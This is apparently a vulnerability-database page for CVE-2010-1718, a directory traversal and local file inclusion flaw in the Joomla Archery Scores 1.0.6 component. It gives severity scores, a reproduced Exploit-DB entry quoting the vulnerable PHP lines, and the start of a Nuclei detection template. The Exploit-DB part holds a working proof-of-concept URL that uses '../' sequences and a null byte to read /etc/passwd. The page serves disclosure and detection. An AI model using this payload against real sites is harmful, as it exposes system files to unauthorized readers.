CVE-2010-1718
published 2010-05-04CVE-2010-1718: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include…
PriorityP347medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
9.46%
94.8th percentile
Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lispeltuut | com_archeryscores | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
exploitdb·2010-04-18
CVE-2010-1718 Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
---
Title : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
Vendor : http://lispeltuut.org/
Download : http://lispeltuut.org/archery-scores/download
Date : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
[+] Vulnerable
./components/com_archeryscores/archeryscores.php
Line 22: if($controller = JRequest::getVar('controller')) {
Line 23: require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
Line 24: }
[+] Exploit
http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
Nuclei
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1718 [MEDIUM] Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Unauthenticated attackers can exploit directory traversal th
2010-05-04
Published